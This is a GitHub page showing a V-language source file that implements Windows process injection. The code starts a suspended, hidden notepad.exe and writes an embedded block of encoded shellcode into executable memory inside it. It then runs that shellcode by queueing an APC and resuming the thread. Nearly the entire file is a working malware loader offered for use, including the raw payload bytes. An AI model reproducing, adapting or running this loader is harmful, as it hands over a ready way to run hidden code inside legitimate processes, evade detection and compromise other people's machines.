-
Notifications
You must be signed in to change notification settings - Fork 4
/
2_processHollowing.v
122 lines (104 loc) · 4.47 KB
/
2_processHollowing.v
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
module main
#flag -luser32
#flag -lkernel32
struct ProcessInformation {
mut:
h_process voidptr
h_thread voidptr
dw_process_id u32
dw_thread_id u32
}
struct StartupInfo {
mut:
cb u32
lp_reserved &u16
lp_desktop &u16
lp_title &u16
dw_x u32
dw_y u32
dw_x_size u32
dw_y_size u32
dw_x_count_chars u32
dw_y_count_chars u32
dw_fill_attributes u32
dw_flags u32
w_show_window u16
cb_reserved2 u16
lp_reserved2 &byte
h_std_input voidptr
h_std_output voidptr
h_std_error voidptr
}
type PTHREAD_START_ROUTINE = fn(voidptr) voidptr
type PAPCFUNC = fn(voidptr) voidptr
fn C.ZeroMemory(voidptr, usize)
fn C.VirtualAlloc(voidptr, usize, u32, u32) voidptr
fn C.VirtualAllocEx(voidptr, voidptr, usize, u32, u32) voidptr
fn C.WaitForSingleObject(voidptr, int)
fn C.WriteProcessMemory(voidptr, voidptr, voidptr, usize, voidptr)
fn C.QueueUserAPC(voidptr, voidptr, voidptr)
fn C.ResumeThread(voidptr)
fn C.OpenThread(u32, bool, u32) voidptr
fn main() {
shellcode := [
byte(0xda),0xc0,0xbf,0x66,0x3a,0x39,0xe5,0xd9,0x74,0x24,0xf4,0x5b,0x33,0xc9,0xb1
,0x31,0x31,0x7b,0x18,0x03,0x7b,0x18,0x83,0xeb,0x9a,0xd8,0xcc,0x19,0x8a,0x9f
,0x2f,0xe2,0x4a,0xc0,0xa6,0x07,0x7b,0xc0,0xdd,0x4c,0x2b,0xf0,0x96,0x01,0xc7
,0x7b,0xfa,0xb1,0x5c,0x09,0xd3,0xb6,0xd5,0xa4,0x05,0xf8,0xe6,0x95,0x76,0x9b
,0x64,0xe4,0xaa,0x7b,0x55,0x27,0xbf,0x7a,0x92,0x5a,0x32,0x2e,0x4b,0x10,0xe1
,0xdf,0xf8,0x6c,0x3a,0x6b,0xb2,0x61,0x3a,0x88,0x02,0x83,0x6b,0x1f,0x19,0xda
,0xab,0xa1,0xce,0x56,0xe2,0xb9,0x13,0x52,0xbc,0x32,0xe7,0x28,0x3f,0x93,0x36
,0xd0,0xec,0xda,0xf7,0x23,0xec,0x1b,0x3f,0xdc,0x9b,0x55,0x3c,0x61,0x9c,0xa1
,0x3f,0xbd,0x29,0x32,0xe7,0x36,0x89,0x9e,0x16,0x9a,0x4c,0x54,0x14,0x57,0x1a
,0x32,0x38,0x66,0xcf,0x48,0x44,0xe3,0xee,0x9e,0xcd,0xb7,0xd4,0x3a,0x96,0x6c
,0x74,0x1a,0x72,0xc2,0x89,0x7c,0xdd,0xbb,0x2f,0xf6,0xf3,0xa8,0x5d,0x55,0x99
,0x2f,0xd3,0xe3,0xef,0x30,0xeb,0xeb,0x5f,0x59,0xda,0x60,0x30,0x1e,0xe3,0xa2
,0x75,0xd0,0xa9,0xef,0xdf,0x79,0x74,0x7a,0x62,0xe4,0x87,0x50,0xa0,0x11,0x04
,0x51,0x58,0xe6,0x14,0x10,0x5d,0xa2,0x92,0xc8,0x2f,0xbb,0x76,0xef,0x9c,0xbc
,0x52,0x8c,0x43,0x2f,0x3e,0x7d,0xe6,0xd7,0xa5,0x81]
println('Creating a process')
// Create a process (notepad.exe)
mut child_stdin := &u32(0)
mut child_stdout_read := &u32(0)
mut child_stdout_write := &u32(0)
cmd := "notepad.exe"
command_line := [32768]u16{}
proc_info := ProcessInformation{}
start_info := StartupInfo{
lp_reserved2: 0
lp_reserved: 0
lp_desktop: 0
lp_title: 0
cb: sizeof(C.PROCESS_INFORMATION)
h_std_input: child_stdin
h_std_output: child_stdout_write
h_std_error: child_stdout_write
dw_flags: u32(C.STARTF_USESTDHANDLES)
}
C.ZeroMemory(&start_info, sizeof(start_info))
C.ZeroMemory(&proc_info, sizeof(proc_info))
C.ExpandEnvironmentStringsW(cmd.to_wide(), voidptr(&command_line), 32768)
// CREATE_SUSPENDED 0x00000004 CREATE_NO_WINDOW 0x08000000
create_process_ok := C.CreateProcessW(0, &command_line[0], 0, 0, C.FALSE, 0x00000004|0x08000000, 0, 0,
voidptr(&start_info), voidptr(&proc_info))
if create_process_ok == false {
println("Error to create a process")
}
C.WaitForSingleObject(proc_info.h_process, 2000)
hprocess := proc_info.h_process
hthread := proc_info.h_thread
// Allocation Memory and Write shellcode to the allocated buffer
println('Creating virtualAlloc')
//MEM_COMMIT 0x00001000 MEM_RESERVE 0x00002000
// PAGE_EXECUTE_READWRITE 0x40
//h_alloc := C.VirtualAlloc(voidptr(&hprocess), size_t(sizeof(shellcode)), 0x00001000|0x00002000, 0x40)
h_alloc := C.VirtualAllocEx(hprocess, 0, usize(sizeof(shellcode)), 0x00001000|0x00002000, 0x40)
println('WriteProcessMemory')
C.WriteProcessMemory(hprocess, h_alloc, shellcode.data, shellcode.len, 0)
// Inject into the suspended thread.
apc_routine := PTHREAD_START_ROUTINE(h_alloc)
//hthread2 := C.OpenThread(0x06010000, C.TRUE, proc_info.dw_thread_id)
C.QueueUserAPC(PAPCFUNC(apc_routine), hthread, 0)
// Resume the suspended thread
C.ResumeThread(hthread)
}